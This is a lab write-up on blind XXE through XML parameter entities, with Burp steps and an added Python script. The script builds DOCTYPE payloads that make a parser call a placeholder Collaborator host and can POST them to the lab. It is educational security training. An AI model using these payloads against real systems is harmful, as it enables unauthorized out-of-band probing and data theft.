11.4 Lab: Blind XXE with out-of-band interaction via XML parameter entities | 2024


Karthikeyan Nagaraj

InfoSec Write-ups

This lab has a “Check stock” feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.

To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

1. Visit a product page, click “Check stock” and intercept the resulting POST request in Burp Suite.

2. Insert the following external entity definition between the XML declaration and the stockCheck element. Because the lab blocks regular (general) external entities, the definition must declare a parameter entity (an ENTITY whose name is prefixed with %) and reference it inside the DTD, so that the parser dereferences the URL while it is still processing the DOCTYPE rather than when it expands the document body.

3. Right-click and select “Insert Collaborator payload” to insert a Burp Collaborator subdomain where indicated.

4. Go to the Collaborator tab and click “Poll now”. If no interactions are listed, wait a few seconds and try again.

5. You should see DNS and HTTP interactions initiated by the application as a result of your payload. Once they appear, the lab is solved.
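The following script is an added example, not code from the original write-up or from PortSwigger. It builds the two payload shapes the lab distinguishes (a regular general entity, which the lab blocks, and the parameter-entity form that solves it), then shows offline why the parameter entity works: a parser configured to resolve external entities dereferences the URL while reading the DTD, before it ever reaches the stockCheck element. The network is replaced by a recording resolver so the check runs without a Collaborator instance; the lab path /product/stock, the Content-Type, the product/store IDs and the oastify.com hostname are assumptions.

```python
# Added example (not from the original write-up): blind XXE via an XML
# parameter entity, demonstrated offline with Python's xml.sax parser.
# Assumptions: the stock-check endpoint lives at /product/stock, accepts
# application/xml, and the Collaborator hostname below is a placeholder.
import io
import urllib.request
import xml.sax
from xml.sax import handler
from xml.sax.xmlreader import InputSource

# Constructed sample body, shaped like the lab's stock-check request.
STOCK_CHECK_BODY = (
    "<stockCheck><productId>{pid}</productId><storeId>1</storeId></stockCheck>"
)


def general_entity_payload(oob_url: str) -> str:
    """Regular (general) external entity referenced from the body with &xxe;.
    This is the form the lab's filter rejects."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "{oob_url}">]>\n'
        + STOCK_CHECK_BODY.format(pid="&xxe;")
    )


def parameter_entity_payload(oob_url: str) -> str:
    """Parameter entity (% xxe) declared and immediately referenced (%xxe;)
    inside the DTD. The fetch happens during DOCTYPE processing, so no value
    from the body needs to be echoed back and no & reference is needed."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "{oob_url}"> %xxe; ]>\n'
        + STOCK_CHECK_BODY.format(pid="1")
    )


class RecordingResolver(handler.EntityResolver):
    """Stands in for the network: records every external entity the parser
    asks for and hands back an empty body instead of fetching the URL."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = InputSource(systemId)
        src.setByteStream(io.BytesIO(b""))  # nothing is fetched
        return src


def parse_like_vulnerable_server(xml_text: str) -> list:
    """Parses with xml.sax configured to resolve external entities (the
    misconfiguration behind XXE) and returns the URLs the parser tried to
    dereference. A hardened server would leave feature_external_ges off."""
    resolver = RecordingResolver()
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, True)
    parser.setEntityResolver(resolver)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return resolver.requested


def send_to_lab(lab_url: str, xml_text: str) -> int:
    """Posts the payload to the assumed stock-check endpoint and returns the
    HTTP status. Real network call; the lab's reply itself is uninteresting,
    the evidence arrives in Burp Collaborator."""
    req = urllib.request.Request(
        lab_url.rstrip("/") + "/product/stock",
        data=xml_text.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status


if __name__ == "__main__":
    collab = "http://YOUR-SUBDOMAIN.oastify.com"  # placeholder Collaborator payload
    payload = parameter_entity_payload(collab)
    print(payload)
    print("parser would contact:", parse_like_vulnerable_server(payload))
    # send_to_lab("https://YOUR-LAB-ID.web-security-academy.net", payload)
```

Running the script prints the payload and the URL the parser dereferenced while processing the DOCTYPE; against the lab, uncomment the `send_to_lab` call with your lab URL and a freshly inserted Collaborator subdomain, then poll Collaborator as in steps 4 and 5.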
